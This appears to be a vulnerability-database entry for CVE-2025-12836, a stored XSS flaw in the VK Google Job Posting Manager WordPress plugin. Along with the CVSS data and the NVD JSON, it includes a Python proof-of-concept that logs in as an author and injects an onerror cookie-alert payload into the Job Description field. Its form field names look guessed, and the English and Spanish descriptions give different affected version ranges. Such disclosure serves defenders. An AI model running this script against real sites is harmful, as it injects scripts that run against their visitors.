Security Vulnerability Report
中文
CVE-2025-12836 CVSS 6.4 MEDIUM

CVE-2025-12836

Published: 2026-01-24 08:16:04
Last Modified: 2026-04-15 00:35:42

Description

The VK Google Job Posting Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Job Description field in versions up to, and including, 1.2.23 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers with author-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

VK Google Job Posting Manager <= 1.2.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from bs4 import BeautifulSoup # CVE-2025-12836 PoC - Stored XSS in VK Google Job Posting Manager # Target: WordPress site with vulnerable VK Google Job Posting Manager plugin (<=1.2.23) TARGET_URL = "http://target-wordpress-site.com" USERNAME = "author_user" PASSWORD = "author_password" # Malicious XSS payload XSS_PAYLOAD = '<img src=x onerror=alert(document.cookie)>' def login(): """Authenticate to WordPress and obtain session cookies""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data) return session if 'wordpress_logged_in' in str(session.cookies) else None def inject_xss(session): """Inject XSS payload into Job Description field""" # Navigate to VK Google Job Posting Manager job creation page create_job_url = f"{TARGET_URL}/wp-admin/admin.php?page=vk-google-job-posting-manager" # Get the page to extract nonce and form data page = session.get(create_job_url) # Extract nonce for the form soup = BeautifulSoup(page.text, 'html.parser') nonce = soup.find('input', {'name': 'vk_google_job_posting_nonce'}) if not nonce: print("[-] Failed to find form nonce") return False nonce_value = nonce.get('value') # Prepare job data with XSS payload in description field job_data = { 'vk_google_job_posting_nonce': nonce_value, 'job_title': 'Test Job Position', 'job_description': XSS_PAYLOAD, # XSS injection point 'job_location': 'Remote', 'action': 'save_job', '_wp_http_referer': create_job_url } response = session.post(create_job_url, data=job_data) return 'success' in response.text.lower() or response.status_code == 200 def main(): print("[*] CVE-2025-12836 PoC - VK Google Job Posting Manager Stored XSS") print("[*] Target:", TARGET_URL) session = login() if not session: print("[-] Authentication failed") sys.exit(1) print("[+] Authentication successful") if inject_xss(session): print("[+] XSS payload injected successfully") print("[*] Visit the job page to trigger the XSS") else: print("[-] Failed to inject XSS payload") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12836", "sourceIdentifier": "[email protected]", "published": "2026-01-24T08:16:03.870", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The VK Google Job Posting Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Job Description field in versions up to, and including, 1.2.23 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers with author-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin VK Google Job Posting Manager para WordPress es vulnerable a cross-site scripting almacenado a través del campo 'Job Description' en versiones hasta la 1.2.20, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes en los atributos proporcionados por el usuario. Esto permite a atacantes autenticados con permisos de nivel de autor y superiores inyectar scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/vk-google-job-posting-manager/tags/1.2.20/vk-google-job-posting-manager.php#L419", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/vk-google-job-posting-manager/tags/1.2.20/vk-google-job-posting-manager.php#L468", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3449302/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4e0fd492-19ee-430e-a495-99ad28043bf9?source=cve", "source": "[email protected]"}]}}